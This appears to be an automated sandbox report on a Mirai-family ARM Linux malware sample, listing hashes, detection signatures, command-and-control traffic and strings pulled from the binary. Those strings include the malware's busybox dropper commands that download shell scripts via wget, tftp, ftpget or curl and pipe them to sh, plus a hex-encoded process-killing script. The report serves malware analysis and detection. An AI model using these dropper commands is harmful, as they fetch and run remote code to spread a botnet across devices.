Linux Analysis Report
t7bAVQ2wpF.elf

Overview

General Information

Sample name: t7bAVQ2wpF.elf
renamed because original name is a hash value
Original sample name: 8e0a09cf1671e5988ee92306eaf9f3ba.elf
Analysis ID: 1432514
MD5: 8e0a09cf1671e5988ee92306eaf9f3ba
SHA1: c1dbf170739dfc193bcec378cdabc5ac42d49656
SHA256: 582a9ac17eead1eb6737b79c6cd3b27512ca66a42bbcd0785dfb2853fe0a0c43
Tags: 32armelfmirai
Infos:

Detection

Score: 52
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection

barindex
Source: t7bAVQ2wpF.elf ReversingLabs: Detection: 57%
Source: t7bAVQ2wpF.elf Virustotal: Detection: 60% Perma Link
Source: t7bAVQ2wpF.elf String: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0

Networking

barindex
Source: global traffic TCP traffic: 86.104.194.178 ports 38241,1,2,3,4,8
Source: global traffic TCP traffic: 192.168.2.13:47194 -> 86.104.194.178:38241
Source: /tmp/t7bAVQ2wpF.elf (PID: 5431) Socket: 127.0.0.1::39148 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 205.185.68.7
Source: unknown TCP traffic detected without corresponding DNS query: 118.2.94.149
Source: unknown TCP traffic detected without corresponding DNS query: 130.28.151.176
Source: unknown TCP traffic detected without corresponding DNS query: 167.255.170.47
Source: unknown TCP traffic detected without corresponding DNS query: 131.242.196.44
Source: unknown TCP traffic detected without corresponding DNS query: 116.136.200.97
Source: unknown TCP traffic detected without corresponding DNS query: 214.194.161.151
Source: unknown TCP traffic detected without corresponding DNS query: 201.245.214.159
Source: unknown TCP traffic detected without corresponding DNS query: 31.206.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 27.55.29.204
Source: unknown TCP traffic detected without corresponding DNS query: 129.188.185.131
Source: unknown TCP traffic detected without corresponding DNS query: 156.249.247.79
Source: unknown TCP traffic detected without corresponding DNS query: 174.81.152.76
Source: unknown TCP traffic detected without corresponding DNS query: 108.171.185.32
Source: unknown TCP traffic detected without corresponding DNS query: 222.107.126.214
Source: unknown TCP traffic detected without corresponding DNS query: 148.77.226.9
Source: unknown TCP traffic detected without corresponding DNS query: 111.216.140.98
Source: unknown TCP traffic detected without corresponding DNS query: 144.176.176.75
Source: unknown TCP traffic detected without corresponding DNS query: 168.195.137.13
Source: unknown TCP traffic detected without corresponding DNS query: 140.155.38.247
Source: unknown TCP traffic detected without corresponding DNS query: 28.250.160.88
Source: unknown TCP traffic detected without corresponding DNS query: 49.6.235.97
Source: unknown TCP traffic detected without corresponding DNS query: 218.236.243.71
Source: unknown TCP traffic detected without corresponding DNS query: 81.138.8.220
Source: unknown TCP traffic detected without corresponding DNS query: 181.68.212.178
Source: unknown TCP traffic detected without corresponding DNS query: 121.115.152.95
Source: unknown TCP traffic detected without corresponding DNS query: 60.187.81.123
Source: unknown TCP traffic detected without corresponding DNS query: 167.175.233.46
Source: unknown TCP traffic detected without corresponding DNS query: 86.222.253.85
Source: unknown TCP traffic detected without corresponding DNS query: 126.74.106.186
Source: unknown TCP traffic detected without corresponding DNS query: 85.23.73.119
Source: unknown TCP traffic detected without corresponding DNS query: 44.99.92.227
Source: unknown TCP traffic detected without corresponding DNS query: 209.227.169.50
Source: unknown TCP traffic detected without corresponding DNS query: 125.100.17.248
Source: unknown TCP traffic detected without corresponding DNS query: 31.147.8.17
Source: unknown TCP traffic detected without corresponding DNS query: 109.100.158.246
Source: unknown TCP traffic detected without corresponding DNS query: 61.105.57.84
Source: unknown TCP traffic detected without corresponding DNS query: 153.160.228.99
Source: unknown TCP traffic detected without corresponding DNS query: 124.97.190.117
Source: unknown TCP traffic detected without corresponding DNS query: 30.238.167.53
Source: unknown TCP traffic detected without corresponding DNS query: 3.43.157.244
Source: unknown TCP traffic detected without corresponding DNS query: 52.171.122.136
Source: unknown TCP traffic detected without corresponding DNS query: 223.123.81.26
Source: unknown TCP traffic detected without corresponding DNS query: 66.188.54.230
Source: unknown TCP traffic detected without corresponding DNS query: 70.239.6.82
Source: unknown TCP traffic detected without corresponding DNS query: 153.153.250.226
Source: unknown TCP traffic detected without corresponding DNS query: 184.93.201.25
Source: unknown TCP traffic detected without corresponding DNS query: 67.145.108.32
Source: unknown TCP traffic detected without corresponding DNS query: 216.33.63.14
Source: unknown TCP traffic detected without corresponding DNS query: 202.175.22.107
Source: global traffic DNS traffic detected: DNS query: chinklabs.dyn
Source: t7bAVQ2wpF.elf String found in binary or memory: http:///curl.sh
Source: t7bAVQ2wpF.elf String found in binary or memory: http:///wget.sh
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: usage: busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample String containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sample String containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sample String containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0
Source: Initial sample String containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4H
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal52.troj.linELF@0/102@1/0
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5470/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5470/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5460/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5460/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5460/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5460/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5471/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5471/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5461/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5461/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5461/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5461/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5472/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5472/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5462/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5462/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5473/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5473/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5463/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5463/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5474/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5474/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5464/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5464/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5475/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5475/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5465/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5465/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5466/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5466/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5467/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5467/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5457/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5457/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5468/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5468/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5458/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5458/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5458/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5458/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5469/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5469/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5459/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5459/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5459/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5459/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5526/maps Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5439) File opened: /proc/5526/cmdline Jump to behavior
Source: /tmp/t7bAVQ2wpF.elf (PID: 5431) Queries kernel information via 'uname': Jump to behavior
Source: t7bAVQ2wpF.elf, 5431.1.00007fffbd361000.00007fffbd382000.rw-.sdmp, t7bAVQ2wpF.elf, 5435.1.00007fffbd361000.00007fffbd382000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/t7bAVQ2wpF.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/t7bAVQ2wpF.elf
Source: t7bAVQ2wpF.elf, 5431.1.0000556fd751b000.0000556fd7649000.rw-.sdmp, t7bAVQ2wpF.elf, 5435.1.0000556fd751b000.0000556fd7649000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: t7bAVQ2wpF.elf, 5431.1.00007fffbd361000.00007fffbd382000.rw-.sdmp, t7bAVQ2wpF.elf, 5435.1.00007fffbd361000.00007fffbd382000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: t7bAVQ2wpF.elf, 5431.1.0000556fd751b000.0000556fd7649000.rw-.sdmp, t7bAVQ2wpF.elf, 5435.1.0000556fd751b000.0000556fd7649000.rw-.sdmp Binary or memory string: oU!/etc/qemu-binfmt/arm
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs